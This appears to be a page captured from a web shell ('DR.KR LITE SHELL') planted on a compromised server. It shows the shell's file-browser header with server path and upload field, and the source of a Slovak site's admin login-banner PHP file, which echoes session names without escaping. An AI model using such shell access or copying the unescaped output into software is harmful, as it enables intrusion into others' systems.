Current Path : /home/da040400/www_root/adm/
Upload File :
Current File : /home/da040400/www_root/adm/identifikacia.php

<?php
	require_once('auth.php');
?>


<center>

<table width="920" cellspacing="0" cellpadding="5" border="0">
<tr><td class="tabulka" width="500">Prihlásený užívateľ: <b><?php echo $_SESSION['SESS_FIRST_NAME'];?> <?php echo $_SESSION['SESS_LAST_NAME'];?></b></td>
<td class="tabulka" align="right"><a class="dole" href="heslo.php">zmena hesla</a>&nbsp;|&nbsp;<a class="dole" href="logout.php"><b>odhlásiť sa</b></a>&nbsp;&nbsp;</td></tr>
</table>  
<br><br>
</center>


DR.KR LITE SHELL COPYRIGHT 2016